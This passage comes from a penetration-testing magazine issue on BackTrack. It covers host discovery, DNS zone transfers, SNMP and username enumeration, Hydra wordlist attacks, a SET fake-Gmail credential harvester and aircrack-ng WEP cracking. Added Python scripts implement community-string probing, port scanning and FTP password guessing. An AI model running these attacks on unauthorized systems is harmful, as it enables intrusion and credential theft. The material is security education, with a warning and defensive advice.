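    Run it and you get the two halves of the exercise at once: the client prints the banner it grabbed, the listener prints the text it received. Replace the banner with nothing and the client simply waits half a second before sending, which is the behaviour you see against a bare nc -l.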

    Network host identification

    As I said, finding information about the target is the basis of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, write your own host discovery scripts using ping and NC, or use some of the wonderful tools present in BT. In my opinion the best are Unicornscan and Nmap, but since I will explain them shortly, let's first explore some other programs with fewer options that work just as well.

    Figure 2. Netdiscover at work

    Figure 1. Netcat simple chat

    Start with netdiscover to find live hosts. With netdiscover -P a scan of the common private LAN ranges (including the one you are connected to) is started (see Figure 2).

    Netdiscover can also be pointed at another network interface (-i) and IP range (-r). The -P option gives cleaner, parseable output. Netdiscover is a continuous scanner: it scans the network over and over to find new hosts, so it could even be used as a very simple intrusion detection system. To stop the scan press [CTRL+C].

    In a similar way you can use fping with the -g option to sweep a range of IPs. Note that fping uses ICMP, whereas netdiscover uses ARP to locate hosts; since a host firewall can drop ICMP but must answer ARP to be reachable at all, the two make a good double check.

    Don't forget to write down and keep a record of everything. In particular, start compiling a list of live hosts.

    You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program only finds a few of them, those with a NetBIOS name enabled.

    Let's now try to find something more using DNS discovery. If you are in a domain, or if you are scanning for DNS names on the Web, you can attempt a DNS zone transfer and capture the DNS records. When this operation succeeds you get more sensitive information and, maybe, hosts not previously discovered.

    A DNS zone transfer (AXFR) is the query that synchronizes primary and secondary DNS servers, but if administrators misconfigure them (no restriction on which addresses may request a transfer), anyone can ask for one and get all the DNS records of the zone.

    DNSenum is a tool that tries a zone transfer and captures the results. The basic operation is quite simple: you just have to give it the target domain name. The same check can be done by hand with the host command (host -l <domain> <nameserver>) or dig (dig axfr <domain> @<nameserver>).

    Note that you can try the zone transfer both on a local domain (see Figure 3) and on an Internet domain (see Figure 4).

    Note that a DNS zone transfer, even when successful, does not give an attacker direct access to the servers, but it provides a lot of information that expands the attack surface. Look at Figure 4: the zone transfer reveals at least three attack vectors: webmail, ftp, sftp.

    It is therefore essential to block all the attacks and scans you can. ARP and ICMP scans should also be stopped in a protected LAN. Unfortunately this isn't always practicable: in a Microsoft domain, for example, some administrative tools do not work with restrictive local firewall policies.

    It is not easy to find balance between security and efficiency.

    You have done a good host analysis and you have a list of live IPs in the network. Now you can start on user account identification.

    Find your account

    As with hosts, user discovery can be done in many ways. You can search Google for email accounts of your target company, explore corporate web pages looking for PDF or Word documents and check who their authors are; if you have access to the LAN you are testing, you can try to get information from the SNMP or SMTP protocols.

    Below are some scripts and programs, present in BT, that will help you.

    Figure 4. DNSenum on a Web domain

    Figure 3. DNS zone transfer on a local domain using host command


    theHarvester, by Edge-Security Research, is a very useful one; you will find it in the folder /pentest/enumeration/theharvester. It searches for a company name in various sources (Google, LinkedIn, PGP key servers, Bing) and can be used to extract probable usernames. In Figure 5 you can see the result of a search: maybe vdiaz, cdelojo, cmartorella and xmendez are also FTP, SSH or RDP users.

    Also from Edge-Security, you can use metagoofil (/pentest/enumeration/google/metagoofil/) to find the authors of documents, such as .doc or .pdf files, downloadable from the domain you point it at (the names come from the documents' metadata).

    As well as using web searches to collect company users' names and usernames, you can try to obtain information via SNMP or SMTP.

    SNMP is a protocol carried over UDP (port 161) that is often used to monitor servers and service status. In SNMPv1 and v2c the only authentication is the community string, which is passed in the clear and is often left at its default (public or private), so you can easily guess it and collect a lot of information.

    You can use programs such Snmpenum and Onesixtyone for this. Let's see how they work.

    First use Onesixtyone to enumerate community strings: with the information collected before, make a list of hosts and write it to a file (/tmp/hosts.txt), then change to /pentest/enumeration/snmp/onesixtyone and run the following:

    ./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

    In this command you use the file dict.txt, already present in the onesixtyone folder, to 'brute force' the community strings; you use the hosts file you built before to set the targets and, at the end, you write a log file. Figure 6 shows a sample of what you can get.

    In the sample you see some printers, some switches and a server (192.168.1.10).

    Go on and run snmpenum against 192.168.1.10, using 'public' as the community string and the windows.txt template (already present) to organize the output (see Figure 7).

    This is just a sample; you can get much more than this through SNMP: running processes, open ports, system information and more.

    For now, limit yourself to the users. What you want is a file like hosts.txt, but of possible user names.
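    What onesixtyone does on the wire, as an added example that is not the tool's own code: one SNMPv1 GetRequest per candidate community string, and any GetResponse at all proves the string is accepted, because v1/v2c agents silently drop requests with a wrong community. The BER encoder and decoder are hand-rolled on the standard library; the loopback 'agent' that only answers to public, and its sysDescr string, are constructed for the demo.

```python
"""SNMPv1 community-string probe (onesixtyone-style). Added illustration;
the fake agent and its 'Fake Printer v1.0' sysDescr are constructed."""
import socket
import threading

SYS_DESCR = (1, 3, 6, 1, 2, 1, 1, 1, 0)      # sysDescr.0
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2


def _tlv(tag, body):
    """BER tag-length-value, definite length (short form < 128, else long)."""
    n = len(body)
    if n < 128:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _int(v):
    """BER INTEGER, two's complement (a leading zero if the high bit is set)."""
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def _oid(arcs):
    """BER OBJECT IDENTIFIER: first two arcs packed as 40*a+b, rest base-128."""
    body = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        body.extend(reversed(chunk))
    return _tlv(0x06, bytes(body))


def build_message(community, pdu_tag, request_id, value=b"\x05\x00", oid=SYS_DESCR):
    """SNMPv1 message: version 0, community, PDU{id, status, index, varbinds}.
    `value` is the encoded varbind value (NULL for a request)."""
    varbinds = _tlv(0x30, _tlv(0x30, _oid(oid) + value))
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + varbinds)
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


def _read(buf, pos=0):
    """Decode one TLV at pos -> (tag, body, next_pos)."""
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n


def parse_message(datagram):
    """-> (community, pdu_tag, request_id), or None if not SNMPv1-shaped."""
    try:
        tag, msg, _ = _read(datagram)
        vtag, ver, p = _read(msg)
        ctag, comm, p = _read(msg, p)
        ptag, pdu, _ = _read(msg, p)
        _, rid, _ = _read(pdu)
    except (IndexError, ValueError):
        return None
    if tag != 0x30 or vtag != 0x02 or ver != b"\x00" or ctag != 0x04:
        return None
    return comm.decode("latin-1"), ptag, int.from_bytes(rid, "big", signed=True)


def probe_communities(host, communities, port=161, timeout=1.0):
    """Return the community strings the agent answered for."""
    found = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for rid, comm in enumerate(communities, start=1):
            s.sendto(build_message(comm, GET_REQUEST, rid), (host, port))
            try:
                data, _ = s.recvfrom(4096)
            except socket.timeout:
                continue                      # wrong community: silence
            parsed = parse_message(data)
            if parsed and parsed[1] == GET_RESPONSE and parsed[2] == rid:
                found.append(comm)
    return found


def _fake_agent(accepted="public"):
    """Constructed loopback 'agent': answers only the accepted community."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("127.0.0.1", 0))

    def serve():
        while True:
            data, peer = sock.recvfrom(4096)
            parsed = parse_message(data)
            if parsed and parsed[0] == accepted and parsed[1] == GET_REQUEST:
                reply = build_message(accepted, GET_RESPONSE, parsed[2],
                                      _tlv(0x04, b"Fake Printer v1.0"))
                sock.sendto(reply, peer)

    threading.Thread(target=serve, daemon=True).start()
    return sock.getsockname()[1]


def demo():
    port = _fake_agent()
    return probe_communities("127.0.0.1", ["private", "public", "manager"],
                             port=port, timeout=0.3)


if __name__ == "__main__":
    print("accepted community strings:", demo())
```

    Against a real device you would call probe_communities(host, open("dict.txt").read().split()) with the default port 161. A non-zero error-status in the reply (for instance noSuchName) still counts as a hit: the agent only answers at all when the community is right, which is exactly the signal onesixtyone relies on.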

    There are many other methods to identify users, such as querying an SMTP server (smtpscan) and testing its VRFY command (smtp-user-enum). Spidering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the BackTrack > Information Gathering > Network Analysis menu you will find many tools for this. Collect as many names as you can, but do not forget to add the most common user names (root, admin, administrator) to your list.

    Map the NET

    Let's have a look at network scanners, limiting ourselves to a simple scan whose only objective is to find some services that can be used as targets. Please keep in mind that scanners can do much more than what you will read here.

    Figure 7. Snmpenum at work

    Figure 6. Onesixtyone log

    Figure 5. Maybe we have found some accounts

    Of course, NC can be used as a network scanner, but the best programs are Unicornscan and Nmap, so let's start with the first one. The commands in Figure 8 perform a simple scan of a single target (192.168.34.135), testing common TCP (-m T) and UDP (-m U) ports, typically those used by common services such as FTP, SSH, SMB and MySQL. The last command in Figure 8 scans the whole 192.168.34.* subnet, but only on the FTP, SSH, SMB and RDP ports.

    You can do the same thing with Nmap. The command nmap 192.168.34.135 scans the common TCP ports; if you add the -sU option it scans UDP ports instead. The single target can be replaced with 192.168.34.*, 192.168.34.0/24 or your hosts.txt (with -iL) to cover a whole subnet or specific IPs; adding the option -p 21-23,3389 limits the scan to ports 21, 22, 23 and 3389.

    The result will probably be the same, but with Nmap you will see more information. In addition it can quickly determine what program is listening on a discovered port (-sV) and what operating system is installed (-O). Please look at the Nmap help to learn more options, and remember that the man command and --help are always your friends. If you are afraid of the Terminal, use the Nmap GUI, Zenmap. Remember that every GUI is at least one layer above its command-line program; anyway, let's use the graphical interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9). The scanner gives you one list of hosts running FTP, another of hosts running RDP, and so on.
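    A TCP connect scan that accepts nmap-style port specs such as 21-23,3389 and produces the per-service host lists described above (one list of FTP hosts, one of RDP hosts, ...), as an added example that is not Nmap's or Unicornscan's code. A connect scan completes the three-way handshake on every open port, so it needs no root but is noisy in the target's logs. The fake service and the released port used by the demo are constructed on loopback.

```python
"""TCP connect scanner with nmap-style port specs. Added illustration, not
Nmap or Unicornscan; the loopback target in demo() is constructed."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

SERVICE_NAMES = {21: "ftp", 22: "ssh", 23: "telnet", 445: "smb",
                 3306: "mysql", 3389: "rdp"}


def parse_ports(spec):
    """'21-23,3389' -> [21, 22, 23, 3389]; inclusive ranges, duplicates dropped."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo = int(lo)
        hi = int(hi) if hi else lo
        if not 1 <= lo <= hi <= 65535:
            raise ValueError("bad port range: %r" % part)
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def tcp_connect(host, port, timeout=1.0):
    """One probe: a completed handshake means open. Refused, filtered
    (timeout) and unreachable all count as not open."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(hosts, port_spec, timeout=1.0, workers=64):
    """Probe every host on every port in parallel.
    Returns {port: [hosts with that port open]} for the open ports only."""
    ports = parse_ports(port_spec)
    open_hosts = {p: [] for p in ports}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        jobs = {pool.submit(tcp_connect, h, p, timeout): (h, p)
                for h in hosts for p in ports}
        for job, (h, p) in jobs.items():
            if job.result():
                open_hosts[p].append(h)
    return {p: sorted(hs) for p, hs in open_hosts.items() if hs}


def service_lists(scan_result):
    """{port: hosts} -> {'ftp': [...], 'rdp': [...]}, the lists the text
    describes; unknown ports are named 'tcp/<port>'."""
    return {SERVICE_NAMES.get(p, "tcp/%d" % p): hs
            for p, hs in scan_result.items()}


def _fake_service():
    """Constructed target: a loopback listener that accepts and drops."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Scan loopback for one open port (the fake service) and one closed
    port (bound and released, so nothing listens on it)."""
    open_port = _fake_service()
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    result = scan(["127.0.0.1"], "%d,%d" % (open_port, closed_port))
    return open_port, closed_port, result


if __name__ == "__main__":
    o, c, r = demo()
    print("open %d, closed %d -> %r" % (o, c, service_lists(r)))
```

    For a real run, pass the live-host list from the gathering phase as hosts and "21-23,445,3389" as the spec; the dictionary you get back is exactly the FTP_hosts.txt / RDP_hosts.txt material fed to Hydra later. UDP ports need a different probe (no handshake), which is why Nmap's -sU is a separate scan type.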

    Get the keys

    Well done! You have completed your basic network gathering phase; now you can merge all your lists and launch your first attack.

    What do you need? A username list, a file listing the hosts running a specific service, a password list, and a program to put everything together. You don't have a password list yet, but one can easily be found in the folder /pentest/password/wordlist/ or with a search on the Web. The kind of attack you will do is called a 'wordlist attack': it is not the most elegant way to perform a penetration test, but it can be very effective.

    The program you can use to combine your lists is Hydra (or its GUI, xHydra). Figure 10 shows how it works.

    Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > hydra-gtk) and, in the Target tab, enter the target list (e.g. FTP_hosts.txt), the port to test and the protocol (21 / ftp).

    The options 'Show attempts' and 'Be verbose' are useful to better understand what the program does.

    Go to the Passwords tab and enter the user and password lists; don't forget to check 'try login as password' and 'try empty password'. For a basic test don't use the Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I hope you find some user and password combinations.

    Figure 9. Nmap GUI

    Figure 8. Some basic scans using Unicornscan

    Figure 10. An operation diagram of the operation of THC-Hydra


    You can also extend your lists to improve your chances, but remember that such an attack may take a very long time, and that an online password attack can lock accounts out where a lockout policy is in force, so check the scope first. In a pen test you must have a very strong reason to spend 8 or more hours on a wordlist attack.

    Anyway, if you find some combinations, write them down and be ready to reuse them: users tend to use the same password for more than one service.

    You can start a file of user:password pairs and give it to Hydra in the Passwords tab instead of the separate user and password lists. When you discover a new service, run Hydra first with that pairs file and only then with the full user and password lists. This will speed up your work.
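    The ordering the last few paragraphs recommend, as an added example that is not THC-Hydra's code: previously found user:password pairs first (password reuse), then for each user the empty password, the login name as password, and only then the wordlist, never trying a pair twice and stopping on a user once a password is found. The accounts in FAKE_ACCOUNTS and the demo lists are constructed; ftp_login is the adapter you would plug in for a real FTP target.

```python
"""Wordlist-attack bookkeeping in Hydra's order. Added illustration, not
THC-Hydra's code; FAKE_ACCOUNTS and the demo wordlists are constructed."""
import ftplib


def parse_pairs(text):
    """Parse 'user:password' lines (Hydra's -C file format). Comments and
    blank lines are skipped; a password may itself contain ':'."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, password = line.partition(":")
        pairs.append((user, password))
    return pairs


def candidate_pairs(users, passwords, known_pairs=(), try_empty=True,
                    login_as_password=True):
    """Yield (user, password) candidates in attack order, deduplicated."""
    ordered = list(known_pairs)
    for u in users:
        if try_empty:
            ordered.append((u, ""))
        if login_as_password:
            ordered.append((u, u))
        ordered.extend((u, p) for p in passwords)
    seen = set()
    for pair in ordered:
        if pair not in seen:
            seen.add(pair)
            yield pair


def wordlist_attack(login, users, passwords, known_pairs=(), stop_per_user=True):
    """Drive `login(user, password) -> bool` over the candidates.
    Returns ({user: password}, number_of_attempts)."""
    found, attempts = {}, 0
    for user, password in candidate_pairs(users, passwords, known_pairs):
        if stop_per_user and user in found:
            continue
        attempts += 1
        if login(user, password):
            found[user] = password
    return found, attempts


def ftp_login(host, port=21, timeout=5.0):
    """Adapter for a real FTP target (what Hydra's ftp module does): one
    connection per attempt, success iff the server accepts USER/PASS."""
    def login(user, password):
        try:
            with ftplib.FTP() as ftp:
                ftp.connect(host, port, timeout)
                ftp.login(user, password)
                return True
        except ftplib.all_errors:
            return False
    return login


# Constructed demo target: accounts and passwords made up for this example.
FAKE_ACCOUNTS = {"admin": "admin", "bob": "summer2013", "svc": ""}


def fake_login(user, password):
    return FAKE_ACCOUNTS.get(user) == password


def demo():
    users = ["root", "admin", "bob", "svc"]
    passwords = ["123456", "password", "summer2013"]
    known = parse_pairs("# found on the FTP server earlier\nbob:summer2013\n")
    return wordlist_attack(fake_login, users, passwords, known)


if __name__ == "__main__":
    found, attempts = demo()
    print("found %r in %d attempts" % (found, attempts))
```

    The demo finds three accounts in nine attempts: bob on the very first try because his pair was already known, admin on 'login as password', svc on the empty password; the wordlist itself never has to be reached for them. Swap fake_login for ftp_login("192.168.34.135") to run the same logic against a host from FTP_hosts.txt.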

    I hope you now have a username and password for FTP or SMB, or, if you are lucky, for SSH or RDP.

    This is not the end of the test; this is the beginning. You will use this access to gain more information and to find more vulnerabilities all over the LAN.

    But what if you can't find anything? Don't worry, these are just the first arrows in your quiver. After these you can try many other things, such as web vectors, exploiting some vulnerability, or ARP poisoning. There are so many options that the only limit is you, and every discovery is the start of the next one.

    So when you open a new door, restart from the beginning: restart from sharpening your axe.

    DAVIDE PERUZZI
    Davide Peruzzi, OSCP certified, is a system administrator and freelance security consultant with about 10 years of experience in Information Technology.

    In recent years he has focused on vulnerability assessments, penetration testing, InfoSec, and NetSec. He can be reached at [email protected].


    Pentesting with BackTrack

    Penetration testing, also known as pentesting, is a technique for evaluating the security of computers and networks by simulating attacks from external and internal threats. The pentesting process involves static and dynamic analysis of a system or network in order to reveal potential security issues resulting from improper configuration or hardware/software flaws. These attacks should be executed from the point of view of a potential attacker.

    During this process, when security issues come to light, the pentester tries to exploit them. Successful penetration results are presented to the system owners together with recommendations for closing each loophole and the steps needed to reproduce the attack.

    Warning

    Please consider that all material in this issue of PenTest magazine is intended for educational purposes only. You must not use the skills and information obtained from this reading to attack in any way a system for which you do not have specific authorization or ownership. Reproducing the experiments presented in this article on non-authorized systems is illegal in most of the world and you will ultimately bear the consequences, including very high fines and jail.

    Quick overview of BackTrack

    In the penetration testing community a leader has emerged: BackTrack. Since its first release on the 5th of February 2005 by Mati Aharoni, Devon Kearns and Offensive Security, BackTrack has become a large, stable, and well-known penetration testing distribution. BackTrack is a Debian GNU/Linux-based (via Ubuntu) distribution built for two specific purposes: digital forensics and penetration testing.

    BackTrack comes from the merger of two other distributions, WHAX and Auditor Security Collection, which were already focused on penetration testing. The latest release of BackTrack was published in August 2012 and is named BackTrack 5 R3. Here is a non-exhaustive list of BackTrack tool categories:

    Information gathering; Vulnerability assessment; Exploitation tools; Privilege escalation; Maintaining access; Reverse Engineering; RFID tools; Stress testing; Forensics; Reporting tools; Services; Miscellaneous.

    Installation and Configuration

    In order to follow our step-by-step tutorials and hands-on recipes, you must have access to three different virtual machines: one with BackTrack, one with Windows 7 and, later, one with Windows XP.

    We assume that you have a brand-new installation of BackTrack. If not, you can download the latest version from http://www.backtrack-linux.org/downloads/. To be comfortable, you will need a partition of at least 16 GB.

    At the end of the installation BackTrack reboots and you can log in as root (bt login: root / password: toor). A prompt appears; to launch the GUI, type startx. Change the default root password before you put the machine on any shared network.

    If you want to try this experiment yourself, you will need a licensed copy of Windows 7.

    Here is some advice: use a hypervisor like VirtualBox, because it is easier to install an OS there and it saves you from creating a native partition on your computer; you will gain some precious time!

    In my case, I run the two operating systems on the same laptop using Oracle VirtualBox (see Figure 1).

    After the installation we must set up the network parameters, because the two machines must communicate with each other over the network. For Windows, click the two little screens on the container of the operating system (bottom right corner), then click 'Network Adapters' and set the adapter to 'Bridged Adapter' rather than 'NAT'. In my case the name of the bridged adapter is 'en0: Ethernet', because I use this device to reach the other machine (and the Internet). Repeat this step for BackTrack (see Figure 2). Now it is time to check whether the two machines can see each other: open a terminal on each VM and run ipconfig on Windows and ifconfig on BackTrack. Note: you will probably have to restart the networking service, otherwise the new configuration will not take effect:

    /etc/init.d/networking restart

    Figure 2. Network configuration of Windows 7 and BackTrack 5

    Figure 1. Windows 7 and BackTrack 5r3 side by side

    Figure 3. Ping command in BT terminal


    You will see the IP address of each VM. Then run a ping from BackTrack to the IP address of the Windows VM (see Figure 3). In my case the IP address of my Windows VM is 192.168.1.119, but yours will be different:

    ping 192.168.1.119

    A ping sends a special network packet, an ICMP Echo Request, and waits for the ICMP Echo Reply; no reply usually means either no route to the host or a firewall dropping ICMP.

    Social Engineering Toolkit

    In this part we want to show how to use the Social Engineering Toolkit. First, to recap what social engineering attacks are: it is the art of manipulating people into performing actions or divulging confidential information.

    The Social Engineering Toolkit (SET) appeared in BackTrack 4 and was written by David Kennedy. SET is an open-source Python tool aimed at penetration testing around social engineering. You can find more information about SET on its home page, http://www.secmaniac.com.

    Exploit

    In this case we use SET to create a fake website that harvests credentials.

    Run Social Engineering Toolkit using the Back-Track menu (see Figure 4).

    Make sure that Metasploit and SET are up to date using options 4 and 5 in the SET terminal menu. Select option 1, 'Social-Engineering Attacks', then 'Website Attack Vectors' (see Figure 5). In this first part we use the Credential Harvester Attack Method (option 3). At this point SET offers three choices: use a predefined template (Facebook, Gmail, etc.), clone an existing site, or import a custom HTML file. We use the first option to keep the tutorial easy to follow. Next we can specify a local or an external IP address for the harvester to listen on; in this tutorial we use the local address (to find your IP address, run ifconfig in a terminal; see Figure 6).

    Figure 6. Know your IP address

    Figure 5. Website Attack vector

    Figure 4. Social Engineering tool

    Select Gmail in the next menu and press Enter. Now open Firefox at localhost:80 (see Figure 7). When you use the form to authenticate a user on the fake Gmail page, you can see all the information the user typed in the SET terminal (see Figure 8).

    The process generates two reports, an HTML and an XML file, in /pentest/exploits/set/reports/ (see Figure 9).

    How to protect against social engineering?

    This type of attack is generally delivered by email. To prevent social engineering attacks it is really important to teach people about phishing, to use HTTPS and check the certificate, to recognize spam, and to verify the identity of whoever is asking.

    2 Wireless and Bluetooth

    Wireless WEP 802.11 Security

    To test the security of your wireless network we need the aircrack-ng package (formerly aircrack). The package exists for Windows and Linux and you can find it at http://www.aircrack-ng.org/. BackTrack is specialized for security work, and ships the package together with the drivers for common Wi-Fi cards.

    Aircrack-ng is software for cracking 802.11 WEP keys. It uses the Fluhrer-Mantin-Shamir (FMS) attack, the attacks created by KoreK and, in current versions by default, the faster PTW attack. Once enough packets have been captured, aircrack-ng can find the wireless key almost instantly.

    The aircrack-ng package contains several programs; the three main ones are:

    Airodump-ng: captures packets, scans for networks, and keeps the packets we use to recover the key.

    Aireplay-ng: its main function is injecting packets to stimulate the network so that more packets can be captured.

    Aircrack-ng: recovers the key from the packets captured by airodump-ng.

    For confidentiality the network names (ESSID, Extended Service Set Identifier) have been hidden in the figures, and the access point MAC addresses (BSSID, Basic Service Set Identifier) have been partially censored.

    Start by checking that your wireless card can inject packets: http://www.aircrack-ng.org/doku.php?id=compatible_cards

    Figure 10. Airmon-ng

    Figure 9. Reports

    Figure 8. Information about the user

    Figure 7. Gmail at localhost:80


    Open the terminal and use the command airmon-ng to list the available cards (see Figure 10).

    The MAC address is the identifier of your wireless card. When a hacker attacks a wireless network he usually changes it to hide his identity. First we bring the wireless interface down, then we change our MAC address with the macchanger command (see Figure 11). Since you are working on your own network this step is not really necessary, but it is important to understand the technique.

    Now we use airodump-ng wlan0 to scan for networks. Airodump-ng hops across all channels and shows every AP (Access Point) in range (see Figure 12).

    The PWR column corresponds to the signal power; if airodump-ng cannot determine it, it displays -1. The Beacons column counts the frames transmitted periodically to announce the presence of the wireless LAN; it does not matter for cracking a WEP key. The CH column indicates the channel of the AP.

    The #Data column is the key to cracking WEP. Aircrack-ng recovers the WEP key from the initialization vectors (IVs), and IVs are only seen on data frames. So, simply: more data = more IVs captured = an easier WEP crack.
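    Why the IV count matters, as an added illustration (this is not aircrack-ng's FMS/KoreK/PTW key-recovery code): WEP encrypts each frame with RC4 keyed by the 24-bit IV sent in clear plus the secret key, so two frames under the same IV share a keystream, and a frame whose plaintext is known (every ARP packet starts with the same LLC/SNAP header) gives that keystream away. The key, the IVs and the frame contents are constructed for the demo.

```python
"""WEP keystream reuse. Added illustration, not aircrack-ng's code; the key,
IV and frame contents below are constructed."""
import math
import zlib


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); WEP uses it with IV||key as the RC4 key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: IV (3 bytes, clear) || RC4(IV||key, plaintext || CRC-32 ICV)."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 3 bytes, key 40- or 104-bit")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key, frame):
    """Inverse of wep_encrypt; returns None if the ICV does not match."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + key, body)
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


# LLC/SNAP header that starts every ARP packet on 802.11: known plaintext.
ARP_SNAP = bytes.fromhex("aaaa030000000806")


def keystream_from_known_plaintext(frame, known_prefix):
    """Attacker side, no key needed: C xor P yields the keystream for this IV."""
    iv, body = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(body, known_prefix))


def decrypt_with_keystream(keystreams, frame):
    """Decrypt as many leading bytes as we hold keystream for this frame's IV."""
    iv, body = frame[:3], frame[3:]
    ks = keystreams.get(iv)
    if ks is None:
        return None
    return bytes(c ^ k for c, k in zip(body, ks))


def iv_collision_frames():
    """Birthday bound: frames after which a repeated 24-bit IV is even odds."""
    return int(math.sqrt(2 * (2 ** 24) * math.log(2)))


def demo():
    key = bytes.fromhex("0a0b0c0d0e")                    # constructed 40-bit key
    iv = b"\x01\x02\x03"
    arp_frame = wep_encrypt(key, iv, ARP_SNAP + b"\x00\x01\x08\x00\x06\x04\x00\x01")
    secret = b"GET /admin HTTP/1.0\r\n"                 # constructed second frame
    secret_frame = wep_encrypt(key, iv, secret)          # same IV reused
    iv_seen, ks = keystream_from_known_plaintext(arp_frame, ARP_SNAP)
    recovered = decrypt_with_keystream({iv_seen: ks}, secret_frame)
    return recovered, secret[:len(ks)]


if __name__ == "__main__":
    recovered, truth = demo()
    print("recovered without the key:", recovered, "==", truth)
    print("IV collision expected after about", iv_collision_frames(), "frames")
```

    With only 2^24 IVs, a repeat is expected after a few thousand frames, and a busy AP burns through the whole space in hours; this keystream-reuse weakness is separate from the statistical key-recovery attacks aircrack-ng runs on the IVs, but it is the same 24-bit IV that makes both possible, and it is why the ARP re-injection attack below (replaying a frame with a known plaintext) is so effective at producing usable data.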

    Use CTRL+C to stop scanning. For the best performance, and to capture only the target network, filter on its BSSID with the next command (see Figure 13):

    airodump-ng -c (channel) -w (filename) --bssid (BSSID) (interface)

    Where: channel is the target channel; filename is the prefix of your capture file; BSSID is the target BSSID; interface is your interface.

    The next step, fake authentication, associates your card with the access point so that it accepts the frames you will inject; it also tells you whether the AP has a MAC address filter, because with filtering enabled the association fails. The procedure is not entirely reliable, so if you get an error message or a timeout, don't panic. Open a new tab in the terminal and enter this command (see Figure 14):

    aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 -e (ESSID) (interface)

    Where: BSSID is the target BSSID; ESSID is the target ESSID; the -h value is your card's MAC address (the spoofed one set with macchanger); interface is your interface.

    Now we want to inject traffic to increase the amount of data on the network and make WEP cracking easier. The FMS/KoreK attacks need on the order of 100,000 IVs for a 104-bit key (the PTW attack usually succeeds with far fewer), and the best way to generate IVs is the ARP request re-injection attack, selected with -3: an ARP request captured from the network is replayed over and over, and the AP answers each replay with a freshly encrypted frame and a new IV. Run the following command to force some traffic (see Figure 15):

    aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

    Figure 12. Airodump

    Figure 11. Change your mac address

    Figure 16. Key found

    Figure 15. Aireplay

    Figure 14. Aireplay command

    Figure 13. Airodump

    TABLE OF CONTENTS

    INTRODUCTION TO BACKTRACK

    BackTrack for Pentesting? By Lloyd Wilke

    BUILDING YOUR LAB

    From The Beginning: Building an SQLi Lab. By Guglielmo Scaiola

    How to Set Up a Software Hacking Lab, Parts 1, 2, 3. By Steven Wierckx

    MULTIPHASE TESTING

    Sharpen your Axe with BackTrack. By Davide Peruzzi

    Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and Armitage. By Lance Cleghorn

    BackTrack 4: Target Scoping. By Shakeel Ali, Tedi Heriyanto

    TOOLS

    Metasploit Primer. By George Karpouzas

    Metasploit for Exploit Development: The Tools Inside the Framework. By Guglielmo Scaiola

    Hacking Wireless in 2013. By Terrance Stachowski

    Automating Exploitation with MSFCLI. By Justin Hutchens

    Nikto: How to Launch Mutation Technique. By Ankhorus

    MsfPayload & MsfEncode. By Pankaj Moolrajani and Hitesh Choudhary

    Compromising Passwords With the Next Generation of BackTrack: Kali Linux. By Joseph Muniz

    PenTempest on WordPress. By Massimiliano Sembiante

    SCENARIOS

    Pentesting with BackTrack. By Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme

    Guide to BackTrack 5: Attacking the Client. By Vivek Ramachandran

    Taking Over an Active Directory. By Gilad Ofir

    MS Internet Explorer Sam ID Property Remote Code Execution Vulnerability. By Praveen Parihar


    Where: BSSID is the target BSSID; the -h value is your card's (spoofed) MAC address; wlan0 is your interface.

